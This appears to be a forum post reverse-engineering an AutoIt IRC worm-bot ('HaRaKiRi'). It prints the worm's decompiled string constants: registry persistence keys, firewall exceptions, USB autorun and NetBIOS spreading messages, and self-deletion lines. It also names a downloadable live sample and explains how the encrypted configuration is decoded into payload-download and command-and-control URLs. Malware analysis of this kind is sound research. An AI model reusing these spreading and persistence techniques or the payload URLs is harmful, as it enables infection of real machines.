$gConst0005    "408178571CB7BBE0DC1D7B2D0C42B9AEF2F90AEEB154D0C5BCB81075419295F51C914AAB0EB573C15FCBFBF3EC3426188620D15B1ED10BCF86D48DD37A79649DE123A6259D82EF21624D6E9D92049C564AF51C8ADA73D1F96263E7C6C1DDB79AC73D35403F9FD76B317848D2133330DBBED6B4D99737D814"
$gConst0006    "408178571CB7BBE0DC1D7B2D0C42B9AEF2F90AEEB154D0C5BCB81075419395F51C914AD60EB50FC15FCAFCF0EC34271D8623D05B1ED10BCF86D48DD17A7A1A9FE657A6519AF1EA22624E6F9A95749C544A8E1D82DA73D1FC6262E0C5C1DDB09FC73D35463AEBD714317C48D4133230ACBED7B1DB"
$gConst0007    "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List"
$gConst0008    "040a,080a,0c0a,100a,140a,180a,1c0a,200a,240a,280a,2c0a,300a,340a,380a,3c0a,400a 440a,480a,4c0a,500a"
$gConst0009    "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL"
$gConst000A    "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
$gConst000B    "408178571CB7BBE0DC1D7B2D0C42B9AEF2F90AEEB154D0C5BCB810754192908C1C9134A80EB673B9"
$gConst000C    "1,18941112141573214 <==HaRaKiRi=WoRm=&=BoT==[=O  15Ver "
$gConst000D    "3[DlRegExec] 4Error, probablemente no bajo bien o un proceso lo blokio"
$gConst000E    "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
$gConst000F    "HKLM\Software\Microsoft\Windows\CurrentVersion\policies\Explorer\Run"
$gConst0010    "POINLERINLONID654SE65R4FLJNHSEKJNFVKSEHKUHKUHFKUHLQWPEOFPOMZSMPFO"
$gConst0011    "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced"
$gConst0012    "0409,0809,0c09,1009,1409,1809,1c09,2009,2409,2809,2c09,3009,3409"
$gConst0013    "10[plugin]3 plugin no resopndio en el periodo de un minuto"
$gConst0014    "3[Shellexecute]4 error no se pudo ejecutar el archivo 4"
$gConst0015    "3[DlRegExec]4 archivo fallo al bajar o tamao incorrecto"
$gConst0016    "HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices"
$gConst0017    "HKLM\Software\Microsoft\Windows\CurrentVersion\Runservices"
$gConst0018    "HKCU\Software\Microsoft\Windows\CurrentVersion\Runservices"
$gConst0019    "[HARAKIRI] Ip Remover (wan) activated, Commited Harakiri!"
$gConst001A    "3[UsbSpread] 4,1Usb2System3, DriveDrivename=12 "
$gConst001B    "3[Netbios] 4Activado, 3Resume/Startscanip=4 "
$gConst001C    "3[Netbios] 4Iniciado, 3Resume/Startscanip=4 "
$gConst001D    "Q9VSD1DSS4SDF5G64HFSDSDF79AF6G54B984FGSDFBASASASASSD"
$gConst001E    "3[UsbSpread] 2InActivo, 3usb infections=4 "
$gConst001F    "3[DlRegExec] Algun 4proceso estaba 4abierto"
$gConst0020    "HKLM\Software\Microsoft\Windows\CurrentVersion\Run"
$gConst0021    "http://www.whatismyip.com/automation/n09230945.asp"
$gConst0022    "3[Netbios] 4Rango InZaNe, 3startscanip=4 "
$gConst0023    "HKCU\Software\Microsoft\Windows\CurrentVersion\Run"
$gConst0024    "3[UsbSpread] 4Activo, 3usb infections=4 "
$gConst0025    "A0P52MA78LS9O7EN1UI89A7B9NP6254FU1E3NA2S154HQ987"
$gConst0026    "3[Netbios]4,1Drive2System3, Drivename=12 "
$gConst0027    "FAq9PKZr3vC6sdS4FJ8ker64V1Edf6DS54Fa6G4Kgg5Dr25"
$gConst0028    "3[Netbios] 2Desactivado, 3Ultimo ip=4 "
$gConst0029    "3[Netbios] 2InActivo, 3IpInfections =4 "
$gConst002A    "10[plugin]4 Plugin no existe, upload first"
$gConst002B    "KS54EfgR911SDFSD49R8dV1S3H84SDDD4F51AShD684J8"
$gConst002C    "3[Netbios] 4Rango B, 3startscanip=4 "
$gConst002D    "3[Netbios] 4Rango A, 3startscanip=4 "
$gConst002E    "3[Netbios] 2Detenido, 3Ultimo ip=4 "
$gConst002F    "3[Shellexecute] se ejecuto el archivo 4"
$gConst0030    "3[DlRegExec] regkey encontrado valor:4 "
$gConst0031    "A6SD54g984rhwhhswpd8581dsf681g6bn5146S1468d"
$gConst0032    "3[HARAKIRI] 4,5auchhhhhhhh uuuuuf! plop!"
$gConst0033    "9df51gftr1h19gh650gh5j6046j540fof0o4yu540f"
$gConst0034    "981NTY81KL1DF36DRG684F0080H94ERG498NMJ4SY9"
$gConst0035    "gf854h1t11h1r8601t08j90sd80ew0kty0j4tyj004"
$gConst0036    "3[Netbios] 4Activo, 3Currentip=4 "
$gConst0037    "3[Netbioscopy]4 ERROR al copiar de4 "
$gConst0038    " 237151412114981 "
$gConst0039    "9DFG81R0Z1XC1BVN3651OUT51QW198C47651H9581"
$gConst003A    "3[Netbioscopy] archvio copiado de4 "
$gConst003B    "3[Dlplugin]4 error al bajar archivo"
$gConst003C    "Q4gVgYOdG74CdFGfn6LG5kf5KGDDDSWESddd5AD"
$gConst003D    "LLFPD879S54D6B84654654CVBCVB654CVB654CB"
$gConst003E    "3[DlRegExec] Ejecutado con 4exito"
$gConst003F    "llllsjknaKHjiBIUBikbiybIKLyilUGugLgil"
$gConst0040    "pkJFR951pKHf466847GseJrUoBs85Dd57D777"
$gConst0041    "lo5F46bvf468rhG4A66tha84G684NJY684AG4"
$gConst0042    "3[Reg] Delete HKCU/CV/RunServ=4 "
$gConst0043    "3[Reg] Delete HKLM/CV/RunServ=4 "
$gConst0044    "AADSFsbDG4nh6hSDFweD6jSD16DD4w843Gn1"
$gConst0045    "LKAJSf6DF654fadf4SD0GSGeg5DFGsr46gS"
$gConst0046    "llLLLGS436QWE6ZC654E6546FFSS9d8h7t"
$gConst0047    "Adgf45rwKJK87H883210BHhBH05BGFnbvg"
$gConst0048    "Q9V1S45G64H79AF6G54B984FGBASASASAS"
$gConst0049    "3[Reg] Delete HKLM/P/E/Run=4 "
$gConst004A    ":*:Enabled:Windows Life Messenger"
$gConst004B    "3[Reg] Delete HKLM/CV/Run=4 "
$gConst004C    "3[Reg] Delete HKCU/CV/Run=4 "
$gConst004D    "nickname is owned by someone else"
$gConst004E    "408178571CB7BBE0DC1D7B2D0C42B9AE"
$gConst004F    "3[Reg] HKLM/pol/Expl/Run=4 "
$gConst0050    "HKLM\Software\Microsoft\DRM\amty"
$gConst0051    "3[Dlplugin]2 archivo existe"
$gConst0052    "3[Dlplugin]2 archivo bajado"
$gConst0053    "3[ping] Online, respuesta a "
$gConst0054    "http://checkip.dyndns.org/?rnd1="
$gConst0055    "http://www.whatismyip.com/?rnd1="
$gConst0056    "C:\encratep\compilation\out.exe"
$gConst0057    "FD8dcn654F6J465h4fg698k9l9k69ss"
$gConst0058    "S5J465RT4654GFA5HGRJT54JR78I14C"
$gConst0059    "@netstat.exe %1 %2 | find /v "":"
$gConst005A    "3[UsbSpread] 2Desactivado"
$gConst005B    "3[Regread] RegValue is =4 "
$gConst005C    "R85EfzMkOX100kyp5VrE4eEKVKEEKR"
$gConst005D    "978QIOER6446ADFGLJKGHFA22VBNVB"
$gConst005E    "Q9V7U2s4U9m1H5A6T7K5T4c15Wf9D5"
$gConst005F    "Ki8sdtPm4sQN1g2SBs321PTO4wVeU5"
$gConst0060    "S87NXXgerGHuopFGF554imxFGHcGza"
$gConst0061    "Z9Z9DE4df98h4G6H46df65g4F4444F"
$gConst0062    "3[UsbSpread] DriveName=12 "
$gConst0063    "3[Reg] HKLM/CV/Runserv=4 "
$gConst0064    "3[Reg] HKCU/CV/Runserv=4 "
$gConst0065    "M6A6I7L5S18I6D12FM168DES6N16S"
$gConst0066    "3[X] $Drive2system_expchan "
$gConst0067    "040c,080c,0c0c,100c,140c,180c"
$gConst0068    "http://geoloc.daiguo.com/?ip="
$gConst0069    "H4D8D5U96581H3Y321VBNM1M1MBN"
$gConst006A    "Yz00yzlslnnnlsd654fSDF5654SB"
$gConst006B    "3[UsbSpread] 4Activado"
$gConst006C    "3[UsbSpread] 2Detenido"
$gConst006D    "3[UsbSpread] 4Iniciado"
$gConst006E    "SjJA54ASD8646A2Sdsasd1ASDsb"
$gConst006F    "3[X] $usb2system_expchan "
$gConst0070    "7w7wq8T977T7TU9I7O3UI4P4IU"
$gConst0071    "P4A9uK3i6I4V2V2VB1JH6548C1"
$gConst0072    "a64DGF684SDFf6j4683201rht0"
$gConst0073    "951PJKFZX753QWEFGM258VHTRY"
$gConst0074    "9Z9X92Bb2B92h94H4K75J5Kj5n"
$gConst0075    "ping -n 5 -w 250 127.0.0.1"
$gConst0076    "3[Netbios] PublicIP=4 "
$gConst0077    "3[Reg] HKLM/CV/Run=4 "
$gConst0078    "3[Reg] HKCU/CV/Run=4 "
$gConst0079    "Scripting.FileSystemObject"
$gConst007A    "Nickname is already in use"
$gConst007B    "lJ3unI78hCE988eo87wt8cWET"
$gConst007C    "A0askdh8WDhoH111o8h8DW345"
$gConst007D    "System Volume Information"
$gConst007E    "3[Reg] Shell run =4 "
$gConst007F    "3[Reg] Key Readed= 4"
$gConst0080    "3[X] $ircserverchannel "
$gConst0081    "Q7A4Z1W8S5X2E8D5C2R8F5V2"
$gConst0082    " /AutoIt3ExecuteScript """
$gConst0083    "3Z2X1C9ZX51C7Z4X1CZ9X5C1"
$gConst0084    "9P6L3M8I5J2N7Y4G1V7T5J3M"
$gConst0085    "987ERT6D5F4G3C2V1B6D5F4G"
$gConst0086    "3[Closed wintitle]4 "
$gConst0087    "5<====[processos]====>"
$gConst0088    "3[Reg] 4key Deleted"
$gConst0089    "3[Reg] keysfound=4 "
$gConst008A    "3[msnlifecontacts]4 "
$gConst008B    "3[X] $netbios_expchan "
$gConst008C    "0407,0807,0c07,1007,1407"
$gConst008D    "I9O87PKL654M3B32M9Z5XC1"
$gConst008E    "Yz1slnnnlsd654fSDF5654S"
$gConst008F    "KS54911S49R8dH84S4F84J8"
$gConst0090    " MB, 3Free Space=4 "
$gConst0091    "3[Update]4 updaten!"
$gConst0092    "3[all win titles]4 "
$gConst0093    "3[exploit channels]4 "
$gConst0094    "3[exploit channels]2 "
$gConst0095    "3[Reg] 4keys added"
$gConst0096    "3[msnlifecontacts] "
$gConst0097    "3[X] $firstvhostauth "
$gConst0098    "1F117V1N7CGNGZ4G4N6G84"
$gConst0099    "Vj681VEW66g5h4GH4F6g5s"
$gConst009A    ", 3IpInfections=4 "
$gConst009B    "5<=[processos fin]=>"
$gConst009C    "3[X] $ircserverport "
$gConst009D    "7Q5S3V9T5D1ZS464DFDSDF"
$gConst009E    "3[X] $siteipspread2 "
$gConst009F    "shell\explore\Command="
$gConst00A0    "M13FGMSGM684S68M46G84"
$gConst00A1    "G3F8138J318JC381CHJCJ"
$gConst00A2    "\Microsoft\Messenger\"
$gConst00A3    "M8Y77V69S8488S689O99Q"
$gConst00A4    "3[X] $ircserverdns "
$gConst00A5    "3[X] $siteharikiri "
$gConst00A6    "3[X] $siteipspread "
$gConst00A7    "C:\WINDOWS\system32\"
$gConst00A8    "PpMnKJN5df5G4i4321vV"
$gConst00A9    "95A5756335A574A364C6"
$gConst00AA    " MB 3Freespace=12 "
$gConst00AB    "[System Idletime] "
$gConst00AC    "shell\open\Default=1"
$gConst00AD    "3[X] $botpassword "
$gConst00AE    "3[X] $usb_expchan "
$gConst00AF    "3[X] $Sitecomand1 "
$gConst00B0    "3[X] $Sitecomand2 "
$gConst00B1    "M3MPP1O21V984VCCCVB"
$gConst00B2    "InternetCloseHandle"
$gConst00B3    "3[win titles]4 "
$gConst00B4    "stringClosewintitle"
$gConst00B5    ", 3Lifetime=4 "
$gConst00B6    "shell\open\Command="
$gConst00B7    "Q7M3W8B2P9Z4A6L5S4F"
$gConst00B8    "3[filevercion] "
$gConst00B9    "3[X] $siteonline "
$gConst00BA    "9P1ZQ73MT8V2L6A4G5"
$gConst00BB    "Commited Harakiri!"
$gConst00BC    "LSMD155V86h87EHhHH"
$gConst00BD    "pOjjcASCSC5SC4sc4b"
$gConst00BE    "86h87EHhHLSMD155VH"
$gConst00BF    "3] 3Label=12 "
$gConst00C0    "con_espada_samurai"
$gConst00C1    "[System Uptime] "
$gConst00C2    "3[FileAttrib] "
$gConst00C3    "[HARAKIRI] Adios."
$gConst00C4    "3[wan IP's]4 "
$gConst00C5    "6E523163793968624"
$gConst00C6    "3[X] $siteusb2 "
$gConst00C7    " /c dir /b /s /a "
$gConst00C8    "no nickname given"
$gConst00C9    "is currently used"
$gConst00CA    "oOm2sdk55GDE8cVp"
$gConst00CB    "killpc-name&user"
$gConst00CC    "Ip Remover (wan)"
$gConst00CD    "InternetReadFile"
$gConst00CE    "3[Country] 4"
$gConst00CF    "regcleanharakiri"
$gConst00D0    "3[filelist]="
$gConst00D1    "3[filesize] "
$gConst00D2    "3[X] $siteusb "
$gConst00D3    "GetLastInputInfo"
$gConst00D4    "ZZMCKL542Z5813ZX"
$gConst00D5    """  | find /v "":"
$gConst00D6    "Z4N4X4M5V4C78BV"
$gConst00D7    "ShowSuperHidden"
$gConst00D8    "del suicide.bat"
$gConst00D9    "InternetOpenUrl"
$gConst00DA    "getallwintitles"
$gConst00DB    " 3[channel]2 "
$gConst00DC    " 3[authhost]4"
$gConst00DD    " 3[botpass]4 "
$gConst00DE    " 3Srv_Pack=2 "
$gConst00DF    " MB 3Type=12 "
$gConst00E0    "PrPf8Ms55BL456M"
$gConst00E1    "cometerharakiri"
$gConst00E2    "NOT Closed!!4 "
$gConst00E3    "msnlifecontacts"
$gConst00E4    "X5X14dMnb4b44bf"
$gConst00E5    "X5X14dMnb4b44bo"
$gConst00E6    "EmptyWorkingSet"
$gConst00E7    "ll9865sdzxNsj8"
$gConst00E8    "KzDLzS5c47zSDN"
$gConst00E9    ", 3Size=4 "
$gConst00EA    " 3InternIP4 "
$gConst00EB    "3[botpass]4 "
$gConst00EC    "3[botnick]4 "
$gConst00ED    " 3OSBuild=2 "
$gConst00EE    "3[Drive12 "
$gConst00EF    " 3Status=12 "
$gConst00F0    "harakirimaster"
$gConst00F1    ", Minutes:4 "
$gConst00F2    ", Seconds:4 "
$gConst00F3    "logger set off"
$gConst00F4    "HK reg cleaned"
$gConst00F5    "3[filetime]"
$gConst00F6    "10[Plugin]"
$gConst00F7    "3[X] $ircon "
$gConst00F8    "3[X] $siten "
$gConst00F9    " /c dir /b /a "
$gConst00FA    ":Closing Link:"
$gConst00FB    "Local AppData"
$gConst00FC    "J8K61S54DPPLX"
$gConst00FD    "Explorer.exe "
$gConst00FE    " /c net view "
$gConst00FF    "Closewintitle"
$gConst0100    "3[User]4 "
$gConst0101    "3[server]4 "
$gConst0102    "Regstartupspy"
$gConst0103    "logger set on"
$gConst0104    "configuration"
$gConst0105    "Vz5R78yE8w1Gx"
$gConst0106    " /o-e /od > """
$gConst0107    "\winlogon.exe"
$gConst0108    "lMKNn84jjbvH"
$gConst0109    "D7G445SdxFDC"
$gConst010A    "cleanusb inf"
$gConst010B    "CheckedValue"
$gConst010C    "Explorer.exe"
$gConst010D    "\suicide.bat"
$gConst010E    "InternetOpen"
$gConst010F    "GetLastError"
$gConst0110    ", 3IP=4 "
$gConst0111    " New IP4 "
$gConst0112    "getwintitles"
$gConst0113    " 3[PC]4 "
$gConst0114    "kill-country"
$gConst0115    "kernel32.dll"
$gConst0116    " 3Size=12 "
$gConst0117    "NN654X564BBV"
$gConst0118    "Drive2System"
$gConst0119    ", Hours:4 "
$gConst011A    "TeaTimer.exe"
$gConst011B    "shellexecute"
$gConst011C    "\autorun.inf"
$gConst011D    "GetTickCount"
$gConst011E    "\netstat.bat"
$gConst011F    "Kernel32.dll"
$gConst0120    "kernel32.dll"
$gConst0121    "SuperHidden"
$gConst0122    "VEgXx1013dx"
$gConst0123    "MNBVCCX5454"
$gConst0124    """ goto loop"
$gConst0125    "?action=log"
$gConst0126    "wininet.dll"
$gConst0127    "CreateMutex"
$gConst0128    "alokium.exe"
$gConst0129    "3[Keepup]"
$gConst012A    "LL87S64888Z"
$gConst012B    "autorun.inf"
$gConst012C    "3[OS]2 "
$gConst012D    " 3Lang=2 "
$gConst012E    "ProcessList"
$gConst012F    "KillProcess"
$gConst0130    "netbioscopy"
$gConst0131    "filevercion"
$gConst0132    "desconocido"
$gConst0133    "Cannot join"
$gConst0134    "OpenProcess"
$gConst0135    "CloseHandle"
$gConst0136    "PA21V321BD"
$gConst0137    "TosS587GhM"
$gConst0138    "if exist """
$gConst0139    "secuential"
$gConst013A    "K7K8K5K1V3"
$gConst013B    "FileDelete"
$gConst013C    "Old IP4 "
$gConst013D    "DisableIRC"
$gConst013E    "Psj45a7scl"
$gConst013F    "IPspreader"
$gConst0140    "KDLS547SDN"
$gConst0141    "$com[10]= "
$gConst0142    "$com[11]= "
$gConst0143    "$com[12]= "
$gConst0144    "$com[13]= "
$gConst0145    "$com[14]= "
$gConst0146    "K7K8K5K1V2"
$gConst0147    "K7K8K5K1V4"
$gConst0148    "Usb2System"
$gConst0149    "IRC-remove"
$gConst014A    "K7K8K5K1V5"
$gConst014B    "4iplocales"
$gConst014C    "fileattrib"
$gConst014D    "randompick"
$gConst014E    "cftmen.exe"
$gConst014F    "Portuguese"
$gConst0150    "uint;dword"
$gConst0151    "user32.dll"
$gConst0152    "Your ip is"
$gConst0153    "explorer "
$gConst0154    "REMOVABLE"
$gConst0155    " and 4 "
$gConst0156    "refreship"
$gConst0157    "csrcs.au3"
$gConst0158    "UsbSpread"
$gConst0159    "Currentip"
$gConst015A    "$com[0]= "
$gConst015B    "$com[1]= "
$gConst015C    "$com[2]= "
$gConst015D    "$com[3]= "
$gConst015E    "$com[4]= "
$gConst015F    "$com[5]= "
$gConst0160    "$com[6]= "
$gConst0161    "$com[7]= "
$gConst0162    "$com[8]= "
$gConst0163    "$com[9]= "
$gConst0164    "usbspread"
$gConst0165    "DriveInfo"
$gConst0166    "Z6FRNMML4"
$gConst0167    "reconnect"
$gConst0168    "&version="
$gConst0169    "K0i3l8l1z"
$gConst016A    "Closed4 "
$gConst016B    "Enumerate"
$gConst016C    "NTrun.au3"
$gConst016D    "DlRegExec"
$gConst016E    "csrcs.exe"
$gConst016F    "127.0.0.1"
$gConst0170    "0413,0813"
$gConst0171    "0410,0810"
$gConst0172    "0414,0814"
$gConst0173    "Norwegian"
$gConst0174    "0416,0816"
$gConst0175    "041d,081d"
$gConst0176    "[AutoRun]"
$gConst0177    "REG_DWORD"
$gConst0178    "psapi.dll"
$gConst0179    "N45ASDY4"
$gConst017A    "pclookup"
$gConst017B    "setupirc"
$gConst017C    "D7G4SFDC"
$gConst017D    "msgsplit"
$gConst017E    "Userinfo"
$gConst017F    "P71DHJK5"
$gConst0180    "Harakiri"
$gConst0181    "-RASHNOT"
$gConst0182    "\cmd.exe"
$gConst0183    "Days:4 "
$gConst0184    "Z9031fLK"
$gConst0185    "Idletime"
$gConst0186    "VnSt805f"
$gConst0187    "z99Un4Zx"
$gConst0188    "cmd.exe "
$gConst0189    "filelist"
$gConst018A    "filesize"
$gConst018B    "https://"
$gConst018C    "filetime"
$gConst018D    "Modified"
$gConst018E    "Accessed"
$gConst018F    "W-remove"
$gConst0190    "cftm.exe"
$gConst0191    "randomAZ"
$gConst0192    "Dlplugin"
$gConst0193    "RECYCLER"
$gConst0194    "Recycled"
$gConst0195    "\~ip.tmp"
$gConst0196    "KZ54777y"
$gConst0197    "PI4b6dmM"
$gConst0198    "N7DK651O"
$gConst0199    "Netbios"
$gConst019A    "Country"
$gConst019B    "goTnick"
$gConst019C    "output2"
$gConst019D    "cmd.exe"
$gConst019E    "NETWORK"
$gConst019F    "RAMDISK"
$gConst01A0    "UNKNOWN"
$gConst01A1    "country"
$gConst01A2    "rem_inf"
$gConst01A3    "invalid"
$gConst01A4    "Xio90kK"
$gConst01A5    "Process"
$gConst01A6    "fix_inf"
$gConst01A7    "pc-user"
$gConst01A8    "http://"
$gConst01A9    "vercion"
$gConst01AA    "getplis"
$gConst01AB    "Regread"
$gConst01AC    "Created"
$gConst01AD    "http://"
$gConst01AE    "zZ45sAs"
$gConst01AF    "net.exe"
$gConst01B0    "English"
$gConst01B1    "borrado"
$gConst01B2    "Italian"
$gConst01B3    "todrive"
$gConst01B4    "toshare"
$gConst01B5    "Spanish"
$gConst01B6    "Swedish"
$gConst01B7    "\s*;\s*"
$gConst01B8    "PRIVMSG"
$gConst01B9    "Error: "
$gConst01BA    "Error :"
$gConst01BB    "privmsg"
$gConst01BC    "Zw888Y"
$gConst01BD    "delete"
$gConst01BE    "V8e74y"
$gConst01BF    "Xz0014"
$gConst01C0    "input2"
$gConst01C1    "&host="
$gConst01C2    "&user="
$gConst01C3    "OsInfo"
$gConst01C4    "&type="
$gConst01C5    " 0 0 :"
$gConst01C6    "pcinfo"
$gConst01C7    "&name="
$gConst01C8    "Keepup"
$gConst01C9    "&port="
$gConst01CA    "Uptime"
$gConst01CB    "noname"
$gConst01CC    "logger"
$gConst01CD    "xKw977"
$gConst01CE    "Delete"
$gConst01CF    "udword"
$gConst01D0    "REG_SZ"
$gConst01D1    " a4 "
$gConst01D2    " ,IP2="
$gConst01D3    " ,IP3="
$gConst01D4    " ,IP4="
$gConst01D5    "logout"
$gConst01D6    "plugin"
$gConst01D7    "output"
$gConst01D8    "values"
$gConst01D9    "Zx0Xz8"
$gConst01DA    "regexp"
$gConst01DB    "cftmam"
$gConst01DC    "insane"
$gConst01DD    "Online"
$gConst01DE    "French"
$gConst01DF    "German"
$gConst01E0    "Polish"
$gConst01E1    "U15W1s"
$gConst01E2    "&rnd2="
$gConst01E3    ";start"
$gConst01E4    "PING :"
$gConst01E5    "PING :"
$gConst01E6    "random"
$gConst01E7    "Hidden"
$gConst01E8    "banned"
$gConst01E9    "u15wab"
$gConst01EA    "CDROM"
$gConst01EB    "error"
$gConst01EC    " 12 "
$gConst01ED    "Viz91"
$gConst01EE    " MB."
$gConst01EF    " :4 "
$gConst01F0    "READY"
$gConst01F1    "Write"
$gConst01F2    "Shell"
$gConst01F3    "del """
$gConst01F4    "loop:"
$gConst01F5    "stats"
$gConst01F6    "@crlf"
$gConst01F7    "login"
$gConst01F8    "input"
$gConst01F9    "csrcs"
$gConst01FA    "@#$€&"
$gConst01FB    "+RASH"
$gConst01FC    "-RASH"
$gConst01FD    "Dutch"
$gConst01FE    "Fixed"
$gConst01FF    "start"
$gConst0200    "eggol"
$gConst0201    "\w:\\"
$gConst0202    "FIXED"
$gConst0203    "7sa4z"
$gConst0204    "leave"
$gConst0205    "LEAVE"
$gConst0206    "open="
$gConst0207    "exp1"
$gConst0208    "view"
$gConst0209    "name"
$gConst020A    "ilop"
$gConst020B    "icon"
$gConst020C    "cftm"
$gConst020D    "lang"
$gConst020E    ".exe"
$gConst020F    "prtu"
$gConst0210    "Vx01"
$gConst0211    "JOIN"
$gConst0212    "NICK"
$gConst0213    "none"
$gConst0214    "hhvd"
$gConst0215    ".au3"
$gConst0216    "Read"
$gConst0217    "rem1"
$gConst0218    " /c "
$gConst0219    "nick"
$gConst021A    "user"
$gConst021B    "IP1="
$gConst021C    "fix1"
$gConst021D    "done"
$gConst021E    "nech"
$gConst021F    "mail"
$gConst0220    "wrdn"
$gConst0221    "long"
$gConst0222    "P/ok"
$gConst0223    "VRXe"
$gConst0224    "USER"
$gConst0225    "uaht"
$gConst0226    "dreg"
$gConst0227    "ping"
$gConst0228    "stop"
$gConst0229    "0415"
$gConst022A    " > """
$gConst022B    "4 "
$gConst022C    ";end"
$gConst022D    "&pc="
$gConst022E    "join"
$gConst022F    "quit"
$gConst0230    "&ip="
$gConst0231    "PING"
$gConst0232    "PONG"
$gConst0233    "KICK"
$gConst0234    "nnam"
$gConst0235    "long"
$gConst0236    "quit"
$gConst0237    "rem"
$gConst0238    "-D]"
$gConst0239    "Reg"
$gConst023A    "R:\"
$gConst023B    "Y:\"
$gConst023C    "110"
$gConst023D    "ip2"
$gConst023E    "S:\"
$gConst023F    "Q:\"
$gConst0240    "O:\"
$gConst0241    "fix"
$gConst0242    "V:\"
$gConst0243    "-_-"
$gConst0244    "C:\"
$gConst0245    "G:\"
$gConst0246    "H:\"
$gConst0247    "J:\"
$gConst0248    "P:\"
$gConst0249    "Z:\"
$gConst024A    "reg"
$gConst024B    "-H]"
$gConst024C    "out"
$gConst024D    "dsn"
$gConst024E    "N:\"
$gConst024F    "   "
$gConst0250    "Rem"
$gConst0251    "PC["
$gConst0252    "X:\"
$gConst0253    "khr"
$gConst0254    "Add"
$gConst0255    "T:\"
$gConst0256    "int"
$gConst0257    "M:\"
$gConst0258    "ALL"
$gConst0259    "IP?"
$gConst025A    "F:\"
$gConst025B    "D:\"
$gConst025C    "W:\"
$gConst025D    "int"
$gConst025E    "L:\"
$gConst025F    "str"
$gConst0260    "ptr"
$gConst0261    "kin"
$gConst0262    "*.*"
$gConst0263    "E:\"
$gConst0264    "*@*"
$gConst0265    "UP["
$gConst0266    "off"
$gConst0267    "4 "
$gConst0268    "I:\"
$gConst0269    "U:\"
$gConst026A    "K:\"
$gConst026B    "dos"
$gConst026C    "ips"
$gConst026D    "GC["
$gConst026E    "kiu"
$gConst026F    "PR["
$gConst0270    "WT["
$gConst0271    "str"
$gConst0272    "ptr"
$gConst0273    "UPD"
That's what I finally got out:

Ah yes, before anyone complains later:
This DL is a Virus/Worm - so be careful!
csrcs_HaRaKiRi_WoRmBot.rar


edit add
I was a little curious about that one and wondered what the lines like these:
Code:
      $Var00B7 = StringRegExp($Downloaded, "D7G445SdxFDC", 0)
      $Var00B8 = StringRegExp($Downloaded, "KzDLzS5c47zSDN", 0)
are good for. ( My thoughts: Does this De/encrypt with StringRegExp - or what? )

The only URL (they were of course a bit encrypted, like this: Fn000C(0, "408178571CB7BBE0DC1D7B2D0C42B9AEF2F90AEEB154D0C5BCB81075419395F01C914AD60EB673C15FCBFBF3EC34271B8624D15A1ED50CCF86D78DD67A7A1A9DE123A6219AF1EF57624D6E9C92039C534AF51C8BDA73AFFC6262E0C1C1DDB7E5C73935413F9FD764317C4DD0133331AFBED6B4DE974FDD160BCE2C3E502C8EC3FAE8D5B7E327E509", $Var0096, 2)) that was still online was this: "http://sousi.extasix.com/genst.htm"
On the first look this looked very cryptic:
Code:
<zZ45sAsM8Y77V69S8488S689O99QD7G445SdxFDC408406511BC5BCE4DC197B2F0C45C5ABF2F90DEEB151D7C7BCBD1072419390F662E634D70EB273C45FCEFCF5EC312618KzDLzS5c47zSDNX5X14dMnb4b44bfFAq9PKZr3vC6sdS4FJ8ker64V1Edf6DS54Fa6G4Kgg5Dr25408178571CB7BBE0DC1D7B2D0C42B9AEF2F90AEEB154D0C5BCB81075419395F01C914AD60EB673C15FCBFBF3EC34271B8624D15A1ED50CCE86D48DD77A7A1A99E657A6519AF6EF25624E6F9A95749C544A8E1DFCDA73AF8F6262E0C3C1DDB798C73935413F9FD76A317C4DD1133331A9BED3B1DA974FDD120BCA2C475052F2C2FAEDD5B3E327E57EAC038FB79B5484538EE2B66BBD4625F59DCEC65B626C80AF3FA5D877548F9CE44B541E5BB952FD6520E91A156BE3D054430895C47B73E25DA49C466717D93BBC1358F484B8FFD8128B7597B296B7779229C1A71F9658E4DE4BECB19804937F7C932DD5B64AF7430F9BB7DCE12103EAFB47923F750DFE6B4337213E5A56228AEAC50C7B8CDFA72CF58460ECD4283682CAE72897A1A2598E27D94762FBA6SD54g984rhwhhswpd8581dsf681g6bn5146S1468d>
However, when searching for 'zZ45' in the source code it hit inside one of these mysterious StringRegExp calls:
$Var0072 = StringRegExp($Downloaded, "zZ45sAs", 0)
If it's there $Var0072 gets 1 else it's 0. But let's look for something more exciting like data.
For example 'Sdx' got me here:
Code:
   $Var0096 = "A0P52MA78LS9O7EN1UI89A7B9NP6254FU1E3NA2S154HQ987"
       ...
         $Var00B9 = "D7G445SdxFDC"
         $Var00BA = "KzDLzS5c47zSDN"
         $Var004C = Fn000B($Downloaded, $Var00B9, $Var00BA, $Var0096)

After renaming:
   $EncKey = "A0P52MA78LS9O7EN1UI89A7B9NP6254FU1E3NA2S154HQ987"
       ...
         $Marker1Start= "D7G445SdxFDC"
         $Marker1End= "KzDLzS5c47zSDN"
         $StrData= StrCrop($Downloaded, $Marker1Start, $Marker1End, $EncKey)


So these StringRegExp() strings were just markers.
Well, so it cleared up more and more and I was able to sequence (& later identify) the data:
Code:
<
   zZ45sAs ; $Var0072 Do not DL "http://ZkArMy.dip.jp/oolksh.htm"

   M8Y77V69S8488S689O99Q ;$Var0083 -> Do "192.168~10.1" thing
      D7G445SdxFDC
         ;$Var004C = 192.168~10.1
         408406511...<snip>...312618
      KzDLzS5c47zSDN

   X5X14dMnb4b44bf ;$Var0080    ->"logger set off" (RegWrite($Var002E, "eggol", "REG_SZ", "0");   $Var004B = 0)

   FAq9PKZr3vC6sdS4FJ8ker64V1Edf6DS54Fa6G4Kgg5Dr25
      ;$Var004C = http://sousi.dip.jp/iiii/idl.php cftuon.exe 495096 9.8.0.6 hk9x 1 yy-.exe
      408178571CB7BBE0DC1D7B...<snip>...27D94762FB
   A6SD54g984rhwhhswpd8581dsf681g6bn5146S1468d
>


about "http://sousi.dip.jp/iiii/idl.php cftuon.exe 495096 9.8.0.6 hk9x 1 yy-.exe":
   DownloadUrl: http://sousi.dip.jp/iiii/idl.php ->
   FileName:cftuon.exe
   FileGetSize: 495096
   FileVersion: 9.8.0.6
   RegWriteName: hk9x
   RandomNameMax: 1
   DoNotStartIfProcessExists: yy-.exe
